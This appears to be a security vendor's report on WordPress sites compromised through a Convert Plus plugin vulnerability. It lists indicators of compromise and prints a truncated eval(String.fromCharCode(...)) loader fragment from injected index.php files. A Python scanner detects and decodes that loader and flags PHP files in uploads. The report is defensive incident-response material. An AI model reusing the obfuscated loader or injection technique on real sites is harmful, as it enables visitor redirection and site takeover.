We recently cleaned several sites affected by the recent Convert Plus (convertplug) plugin vulnerability. In most cases the plugin is bundled with the Avada theme. All Convert Plus versions up to and including 3.4.2 are vulnerable.
Users should update to version 3.4.3 ASAP, as this is a critical security issue.
Attackers create users with administrator privileges; malicious JavaScript and backdoor files may be added later on.
That is why we recommend a thorough analysis, followed by a malware cleanup.
Sample malicious users: [email protected], [email protected].
Malicious activity originated from the Netherlands (185.238.1.177, 5.188.62.5, jacksonblue10.ptr1.ru).
Malicious code found so far redirects visitors to a set of attacker-controlled domains, most notably css.developmyredflag[.]top, which also hosts the injected script.
Sample code:
eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59
During cleanup we found malicious backdoor files in the wp-content/uploads folder, so be aware that attackers will try to regain access to the site.
All index.php files were modified as well, injected with malicious JavaScript loaded from css.developmyredflag[.]top.
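As an added example (not part of the original report or of Convert Plus), the following Python script checks a WordPress tree for the two symptoms described above: index.php files carrying an eval(String.fromCharCode(...)) loader, which it decodes so you can see what the payload does, and PHP files dropped under wp-content/uploads. The sample site it builds is constructed for the demonstration.

```python
import os
import re
import tempfile

# Matches the obfuscated loader seen in injected index.php files:
# eval(String.fromCharCode(118, 97, 114, ...))
CHARCODE_RE = re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(\s*([\d,\s]+)\)")


def decode_charcodes(codes: str) -> str:
    """Turn the comma-separated char codes into the JavaScript they hide."""
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())


def scan_wordpress(root: str):
    """Walk a WordPress tree and report index.php files carrying the
    fromCharCode loader, plus PHP files under wp-content/uploads. Some
    installs keep an empty index.php in uploads, so review each hit."""
    findings = []
    uploads = os.path.join(root, "wp-content", "uploads")
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == "index.php":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for m in CHARCODE_RE.finditer(fh.read()):
                        findings.append(("injected_js", path, decode_charcodes(m.group(1))))
            if name.lower().endswith(".php") and path.startswith(uploads):
                findings.append(("php_in_uploads", path, ""))
    return findings


def build_sample_site() -> str:
    """Constructed sample tree (not a real site) reproducing both symptoms."""
    root = tempfile.mkdtemp()
    dropped = os.path.join(root, "wp-content", "uploads", "2019", "05")
    os.makedirs(dropped)
    codes = ",".join(str(ord(c)) for c in "var d=document;")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php /* WP front controller */ ?>\n")
        fh.write("<script>eval(String.fromCharCode(%s))</script>\n" % codes)
    with open(os.path.join(dropped, "wp-cache.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for a dropped file */ ?>\n")
    return root


if __name__ == "__main__":
    for kind, path, detail in scan_wordpress(build_sample_site()):
        print(kind, path, detail)
```

Run it against a copy of the site root to get a list of files to inspect; the decoded payload tells you where the script sends visitors before you touch anything.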
To clean up the infection, you can purchase one of our plans or try to fix it yourself.
Make sure you take a backup before making any changes.
Useful links:
wpvulndb.com ConvertPlus <= 3.4.2: https://wpvulndb.com/vulnerabilities/9325
Wordfence report: https://www.wordfence.com/blog/2019/05/critical-vulnerability-patched-in-popular-convert-plus-plugin/
convertplug.com: https://www.convertplug.com/plus/version-3-4-3-security-update/
Magefix cleanup plans: https://www.magefix.com/pricing